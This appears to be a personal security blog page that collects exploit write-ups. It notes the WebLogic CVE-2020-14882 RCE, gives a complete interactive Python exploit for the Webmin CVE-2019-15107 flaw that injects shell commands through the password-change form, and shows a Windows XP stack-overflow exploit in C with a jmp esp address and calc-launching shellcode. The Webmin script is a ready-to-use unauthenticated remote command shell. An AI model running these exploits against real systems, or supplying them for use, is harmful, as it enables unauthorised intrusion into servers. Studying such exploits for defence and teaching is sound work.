WebLogic Pre-Auth RCE (cve-2020-14882) PoC exploit

Reference : 1. https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf

2. https://github.com/jas502n/CVE-2020-14882 (bypass patch)

cve-2020-14882 is a pre-auth RCE vulnerability in WebLogic discovered by voidfyoo of Chaitin Security Research Lab. This is a high impact and easy to exploit vulnerability.

Wrote a poc exploit to pop up calculator on target server

CVE-2019-15107 Webmin RCE <=1.920 (unauthorized)

1.  Webmin <=1.920
2.  Password expiry policy set to Prompt users with expired passwords to enter a new one. 

Github: webmin_CVE-2019-15107

# Exploit Title: Webmin backdoor CVE-2019-15107 (RCE)
# Exploit author : chako
# Date: 2019-12-29
# Software Link: http://www.webmin.com/download.html (Webmin <= 1.920)
# Vuln Reported by: AkkuS 
# Original Post: https://www.pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html
#                https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15107
#
# "Webmin installation must have Webmin -> Webmin Configuration -> Authentication -> 
# Password expiry policy set to Prompt users with expired passwords to enter a new one. 
# This option is not set by default, but if it is set, it allows remote code execution."
# ---- ( https://www.virtualmin.com/node/66890 )

#!/usr/bin/python
import requests
import sys
import re 

#target = "https://192.168.1.84:10000/password_change.cgi"

if len(sys.argv)>=2:
    target = "https://"+sys.argv[1]+":10000/password_change.cgi"
    cmd = raw_input("Command># ") 
else:
    print "\nUsage: python .\webmin.py [Target IP]\n"
    exit()

while cmd != "exit" :
    client = requests.session()
    requests.packages.urllib3.disable_warnings()
    payload = {'user':'root','pam':'','expired':'2','expired':'2','old':cmd,'new1':'opgg','new2':'opgg'}
    response = client.post(target, verify=False, data=payload,headers=dict(Referer=target))
	
    if response.ok:	    
		x = re.search("(is incorrect)(.*)<\/h3><\/center>", response.text.encode("utf-8"), flags=re.DOTALL)
		if (x):
		    print x.group().replace("</h3></center>","").replace("is incorrect","")
		else:
		    print("No match")
    else:
        print "error code --> ",response.status_code
		
    cmd = raw_input("Command># ") 
    print cmd
	


Reference Link:
https://www.pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15107

rewrite and practice – auth_overflow.c

auth_overflow.c is the example code from book the ” The art of Exploitation ” I rewrite the example code as following to exploit the program.

Tested on win XP

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int check_authentication(char *password) {
  int auth_flag = 0;
  char password_buffer[16];

  strcpy(password_buffer, password);

  if(strcmp(password_buffer, "brillig") == 0)
    auth_flag = 1;
  if(strcmp(password_buffer, "outgrabe") == 0)
    auth_flag = 1;

  return auth_flag;
}

char payload[]="\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
               "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
               "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
               "\x41\x41"
               "\x7b\x46\x86\x7c" //0x7c86467b : jmp esp |  {PAGE_EXECUTE_READ} [kernel32.dll]
               "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"  //NOP
               //Shellcode pop up a calc.exe
               "\x31\xC9"                // xor ecx,ecx        
               "\x51"                    // push ecx        
               "\x68\x63\x61\x6C\x63"    // push 0x636c6163        
              "\x54"                    // push dword ptr esp        
              "\xB8\xC7\x93\xC2\x77"    // mov eax,0x77c293c7      
              "\xFF\xD0"; 



//Address=7C86467B
//Message=  0x7c86467b : jmp esp |  {PAGE_EXECUTE_READ} [kernel32.dll] 
//ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 
// (C:\WINDOWS\system32\kernel32.dll)

int main(int argc, char *argv[]) {

  if(check_authentication(payload)) {
    printf("-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\n");
    printf("       Access Granted\n");
    printf("-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\n");
  } else {
    printf("Access Denied.\n");
  }
}